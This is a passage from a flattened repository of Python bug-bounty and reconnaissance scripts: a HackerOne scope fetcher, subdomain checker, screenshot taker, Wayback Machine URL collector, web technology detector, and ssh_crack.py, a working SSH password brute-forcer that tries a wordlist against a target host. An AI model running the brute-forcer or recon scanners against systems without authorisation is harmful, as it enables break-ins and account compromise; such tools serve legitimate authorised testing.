socket.error: 46 | exit(0) 47 | except OSError: 48 | s.send(b'file not found!\n') 49 | except IndexError: 50 | s.send(b'try again!\n') 51 | except UnicodeEncodeError: 52 | send(b'problem in coding\n') 53 | except KeyboardInterrupt: 54 | s.send(b'connection closed !!\n') 55 | exit(0) -------------------------------------------------------------------------------- /scopes.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # 3 | # Python script to get the scope of Hackerone Private AND Public bug bounty programs 4 | # Get your API token from: https://hackerone.com/settings/api_token/edit 5 | # the program ID e.g Yahoo (https://hackerone.com/yahoo) is "yahoo" :D 6 | # 7 | # This script exclude IOS and Android assets. 8 | # 9 | 10 | import json,requests,argparse 11 | 12 | class scope(): 13 | def __init__(self, program, username, apikey): 14 | headers = {"Accept": "application/json"} 15 | url = 'https://api.hackerone.com/v1/hackers/programs/' + str(program) 16 | data = requests.get(url, headers=headers, auth=(username, apikey)) 17 | 18 | p = json.loads(data.text) 19 | 20 | try: 21 | self.result = p['relationships']['structured_scopes']['data'] 22 | except Exception: 23 | print("[!] Check Program ID, Your Username or Your Token and Try Again!") 24 | exit(1) 25 | 26 | self.count = len(self.result) 27 | 28 | 29 | def InScope(self): 30 | for i in range(self.count): 31 | if self.result[i]['attributes']['eligible_for_submission'] == False or str(self.result[i]['attributes']['asset_type']) == 'GOOGLE_PLAY_APP_ID' or str(self.result[i]['attributes']['asset_type']) == 'APPLE_STORE_APP_ID': 32 | continue 33 | else: 34 | print(self.result[i]['attributes']['asset_identifier']) 35 | 36 | 37 | def OutOfScope(self): 38 | for i in range(self.count): 39 | if self.result[i]['attributes']['eligible_for_submission'] == False: 40 | print(self.result[i]['attributes']['asset_identifier']) 41 | 42 | 43 | 44 | def main(): 45 | ################ This is optional so you don't have to use -t AND -u Arguments. 46 | APIKEY = "" 47 | USERNAME = "" 48 | ################ 49 | 50 | parser = argparse.ArgumentParser() 51 | parser.add_argument("-t", dest="token", type=str, help="Hackerone API Token.") 52 | parser.add_argument("-u", dest="username", type=str, help="Your Hackerone Username.") 53 | parser.add_argument("-p", dest="program", type=str, help="Hackerone Program ID.", required=True) 54 | parser.add_argument("-e", dest="exclude", help="Prints only out of scope assets", action='store_true') 55 | args = parser.parse_args() 56 | 57 | if APIKEY == "": 58 | apikey = str(args.token) 59 | else: 60 | apikey = APIKEY 61 | 62 | if USERNAME == "": 63 | username = str(args.username) 64 | else: 65 | username = USERNAME 66 | 67 | program = str(args.program) 68 | result = scope(program, username, apikey) 69 | 70 | if not args.exclude: 71 | result.InScope() 72 | else: 73 | result.OutOfScope() 74 | 75 | if __name__ == '__main__': 76 | main() 77 | -------------------------------------------------------------------------------- /screentaker.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | blue = "\033[94m" 4 | red = "\033[91m" 5 | bold = "\033[1m" 6 | end = "\033[0m" 7 | 8 | print(blue+bold+""" 9 | ____ _____ _ 10 | / ___| __|_ _|_ _| | _____ _ __ 11 | \___ \ / __|| |/ _` | |/ / _ \ '__| 12 | ___) | (__ | | (_| | < __/ | 13 | |____/ \___||_|\__,_|_|\_\___|_| 14 | 15 | Coded by: Bingo 16 | --------------- 17 | 18 | """+end) 19 | 20 | 21 | 22 | from selenium import webdriver 23 | import sys, time, requests 24 | 25 | f = open('/dev/null', 'w') 26 | sys.stderr = f 27 | 28 | try: 29 | driver = webdriver.PhantomJS() 30 | except: 31 | pass 32 | 33 | 34 | def printer(url): 35 | sys.stdout.write("[+] "+url+" \r") 36 | sys.stdout.flush() 37 | return True 38 | 39 | 40 | def takescreen(link): 41 | printer(link) 42 | driver.get(link) 43 | name = link.split('/')[2] 44 | #time.sleep(2) 45 | if link.startswith('https'): 46 | driver.save_screenshot('https-'+name+'.png') 47 | else: 48 | driver.save_screenshot('http-'+name+'.png') 49 | 50 | return True 51 | 52 | 53 | def check(url): 54 | try: 55 | req = requests.get(url, timeout=10) 56 | scode = str(req.status_code) 57 | #print("status code: "+scode) 58 | if scode.startswith("2") or scode.startswith("3") or scode.startswith("4"): 59 | takescreen(url) 60 | return True 61 | else: 62 | return False 63 | except: 64 | return False 65 | 66 | try: 67 | urlsfile = sys.argv[1]#raw_input("[subdomains list]> ") 68 | except Exception: 69 | print("#Usage:\n\tpython subchecker.py \n") 70 | driver.close() 71 | exit(0) 72 | urls = open(urlsfile, 'r') 73 | 74 | protocols = ['http://','https://'] 75 | 76 | for url in urls: 77 | for protocol in protocols: 78 | url = url.strip('\n') 79 | link = protocol + url 80 | check(link) 81 | driver.close() -------------------------------------------------------------------------------- /ssh_crack.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pexpect import pxssh 4 | from optparse import * 5 | 6 | 7 | class colors: 8 | def __init__(self): 9 | self.blue = "\033[94m" 10 | self.red = "\033[91m" 11 | self.end = "\033[0m" 12 | self.bold = "\033[1m" 13 | cl = colors() 14 | 15 | 16 | print (cl.blue+""" 17 | 18 | *--------------------------------------* 19 | | programmed by : mohamed | 20 | | fb.me/hack1lab | 21 | | fb.me/mohamed1lar | 22 | *--------------------------------------* 23 | _ _ _ _ 24 | | |__ __ _ ___| | _| | __ _| |__ 25 | | '_ \ / _` |/ __| |/ / |/ _` | '_ \ 26 | | | | | (_| | (__| <| | (_| | |_) | 27 | |_| |_|\__,_|\___|_|\_\_|\__,_|_.__/ 28 | 29 | Happy Hacking 30 | ---------------- 31 | 32 | """+cl.end) 33 | parser = OptionParser(""" 34 | 35 | #Usage: 36 | 37 | python ssh.py -t -u -p 38 | 39 | 40 | """) 41 | 42 | def connect(host, user, password): 43 | try: 44 | s = pxssh.pxssh() 45 | s.login(host, user, password) 46 | print cl.red+("\n[+] Password Found: [ {} ] ".format(password))+cl.end 47 | print ("\n[For Connect With SSH Service Write] : ssh {}@{}".format(user,host)) 48 | print "[Then Enter Password]: ",password 49 | print "\n\t* Done *\n" 50 | exit(0) 51 | except Exception: 52 | return None 53 | try: 54 | parser.add_option("-t",dest="target",type="string") 55 | parser.add_option("-u",dest="user",type="string") 56 | parser.add_option("-p",dest="password",type="string") 57 | (options, args) = parser.parse_args() 58 | if options.target == None or options.user == None or options.password == None: 59 | print(parser.usage) 60 | exit(0) 61 | else: 62 | host = str(options.target) 63 | user = str(options.user) 64 | password = str(options.password) 65 | 66 | read = open(password,'r') 67 | for pas in read: 68 | password = pas.strip('\n') 69 | print "Testing Passwd: "+password 70 | connect(host, user, password) 71 | 72 | except KeyboardInterrupt: 73 | print "\n[!] Exit Programme" 74 | exit(0) 75 | 76 | print "\n[-] Oops Password SSH Service Not Found :(\n" 77 | -------------------------------------------------------------------------------- /subchecker.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | yellow = "\033[93m" 4 | green = "\033[92m" 5 | blue = "\033[94m" 6 | red = "\033[91m" 7 | bold = "\033[1m" 8 | end = "\033[0m" 9 | 10 | print(blue+bold+""" 11 | ____ _ ____ _ _ 12 | / ___| _ _| |__ / ___| |__ ___ ___| | _____ _ __ 13 | \___ \| | | | '_ \| | | '_ \ / _ \/ __| |/ / _ \ '__| 14 | ___) | |_| | |_) | |___| | | | __/ (__| < __/ | 15 | |____/ \__,_|_.__/ \____|_| |_|\___|\___|_|\_\___|_| 16 | 17 | Coded by: Bingo 18 | --------------- 19 | 20 | """+end) 21 | 22 | 23 | from concurrent.futures import ThreadPoolExecutor as executor # sudo pip install futures 24 | import sys, requests, argparse 25 | 26 | 27 | def printer(url): 28 | sys.stdout.write(url+" \r") 29 | sys.stdout.flush() 30 | return True 31 | 32 | 33 | 34 | def check(out, url): 35 | printer("Testing: " + url) 36 | url = 'http://' + url 37 | try: 38 | req = requests.head(url, timeout=10) 39 | scode = str(req.status_code) 40 | if scode.startswith("2"): 41 | print(green + "[+] "+scode+" | Found: " + end + "[ " + url + " ]") 42 | elif scode.startswith("3"): 43 | link = req.headers['Location'] 44 | print(yellow + "[*] "+scode+" | Redirection: " + end + "[ " + url + " ]" + yellow + " -> " + end + "[ " + link + " ]") 45 | elif st.startswith("4"): 46 | print(blue+"[!] "+scode+" | Check: " + end + "[ " + url + " ]") 47 | 48 | if out != 'None': 49 | with open(out, 'a') as f: 50 | f.write(url+"\n") 51 | f.close() 52 | 53 | return True 54 | 55 | except Exception: 56 | return False 57 | 58 | 59 | 60 | 61 | def main(): 62 | parser = argparse.ArgumentParser() 63 | parser.add_argument("-w", "--wordlist", help="Domains List File", type=str, required=True) 64 | parser.add_argument("-t", "--thread", help="Theads Number - (Default: 10)", type=int) 65 | parser.add_argument("-o", "--output", help="Save Results In a File", type=str) #action='store_true' 66 | 67 | args = parser.parse_args() 68 | 69 | wlist = str(args.wordlist) 70 | threads = str(args.thread) 71 | out = str(args.output) 72 | 73 | if threads == 'None': 74 | threads = 10 75 | else: 76 | threads = threads 77 | 78 | lines = len(open(wlist).readlines()) 79 | print(blue +"["+red+"+"+blue+"] File: " + end + wlist) 80 | print(blue +"["+red+"+"+blue+"] Length: " + end + str(lines)) 81 | print(blue +"["+red+"+"+blue+"] Threads: " + end + str(threads)) 82 | print(blue +"["+red+"+"+blue+"] Output: " + end + str(out)) 83 | print(red+bold+"\n[+] Results:\n"+end) 84 | 85 | urls = open(wlist, 'r') 86 | 87 | with executor(max_workers=int(threads)) as exe: 88 | [exe.submit(check, out, url.strip('\n')) for url in urls] 89 | 90 | 91 | 92 | 93 | if __name__=='__main__': 94 | main() 95 | 96 | -------------------------------------------------------------------------------- /waybackmachine.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import requests, sys 4 | 5 | class wayback(): 6 | def __init__(self, url, limit): 7 | self.url = "https://web.archive.org/cdx/search?url="+url+"&matchType=prefix&collapse=urlkey&output=text&fl=original&\ 8 | filter=&limit="+str(limit) 9 | 10 | def get(self): 11 | headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:42.0) Gecko/20100101 Firefox/68.0"} 12 | r = requests.get(self.url, headers=headers) 13 | results = r.text 14 | return results 15 | 16 | 17 | def main(): 18 | if len(sys.argv) < 3: 19 | print("[+] Usage:\n\tpython wayback.py ") 20 | exit(0) 21 | 22 | url = sys.argv[1] 23 | limit = sys.argv[2] 24 | 25 | get = wayback(url, limit) 26 | res = get.get() 27 | 28 | for i in res.split(): 29 | print(i) 30 | 31 | if __name__=='__main__': 32 | main() -------------------------------------------------------------------------------- /webtech.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # 4 | # webtech.py 5 | # 6 | # Copyright 2019 bingo 7 | # 8 | # This program is free software; you can redistribute it and/or modify 9 | # it under the terms of the GNU General Public License as published by 10 | # the Free Software Foundation; either version 2 of the License, or 11 | # (at your option) any later version. 12 | # 13 | # This program is distributed in the hope that it will be useful, 14 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 15 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 16 | # GNU General Public License for more details. 17 | # 18 | # 19 | 20 | from concurrent.futures import ThreadPoolExecutor as executor # pip install futures 21 | from Wappalyzer import Wappalyzer, WebPage # pip install python-Wappalyzer 22 | import urllib3, argparse 23 | 24 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # disable Python SSL warnings ! 25 | 26 | green = "\033[32m" 27 | blue = "\033[34m" 28 | red = "\033[31m" 29 | bold = "\033[1m" 30 | end = "\033[0m" 31 | 32 | wappalyzer = Wappalyzer.latest() 33 | 34 | 35 | print(blue+""" 36 | __ __ _ _____ _ 37 | \ \ / /__| |_|_ _|__ ___| |__ 38 | \ \ /\ / / _ \ '_ \| |/ _ \/ __| '_ \ 39 | \ V V / __/ |_) | | __/ (__| | | | 40 | \_/\_/ \___|_.__/|_|\___|\___|_| |_| @bing0o 41 | Web Technologies Detector 42 | 43 | """+end) 44 | 45 | 46 | 47 | def check(out, ig, url): 48 | if not url.startswith('http'): 49 | url = 'http://' + url 50 | try: 51 | webpage = WebPage.new_from_url(url) 52 | tech = wappalyzer.analyze(webpage) 53 | print("[+] " + str(url) + " | " + green + bold + " - ".join(tech) + end) 54 | if out != 'None': 55 | with open(out, 'a') as f: 56 | f.write(url + " | " + " - ".join(tech) + "\n") 57 | f.close() 58 | 59 | except Exception as e: 60 | if ig == 'True': 61 | pass 62 | else: 63 | print(red+"Error: " + end + "[ " + bold + str(url) + end + " ] > " + str(e)) 64 | 65 | 66 | parser = argparse.ArgumentParser() 67 | parser.add_argument("-w", "--wordlist", help="Domains List File", type=str, required=True) 68 | parser.add_argument("-t", "--thread", help="Theads Number - (Default: 10)", type=int) 69 | parser.add_argument("-i", "--ignore", help="To Ignore The Errors", action='store_true') 70 | parser.add_argument("-o", "--output", help="Save The Results To a File", type=str) 71 | 72 | args = parser.parse_args() 73 | 74 | links = str(args.wordlist) 75 | threads = str(args.thread) 76 | ig = str(args.ignore) 77 | out = str(args.output) 78 | 79 | lines = len(open(links).readlines()) 80 | 81 | if threads == 'None': 82 | threads = 10 83 | 84 | print(blue +"["+red+"+"+blue+"] File: " + end + links) 85 | print(blue +"["+red+"+"+blue+"] Length: " + end + str(lines)) 86 | print(blue +"["+red+"+"+blue+"] Output: " + end + str(out)) 87 | print(blue +"["+red+"+"+blue+"] Threads: " + end + str(threads)) 88 | print(blue +"["+red+"+"+blue+"] Ignore: " + end + str(ig)) 89 | 90 | print(red+"\n[+] Results:\n"+end) 91 | 92 | 93 | urls = open(links,'r') 94 | with executor(max_workers=int(threads)) as exe: 95 | [exe.submit(check, out, ig, url.strip('\n')) for url in urls] 96 | 97 | --------------------------------------------------------------------------------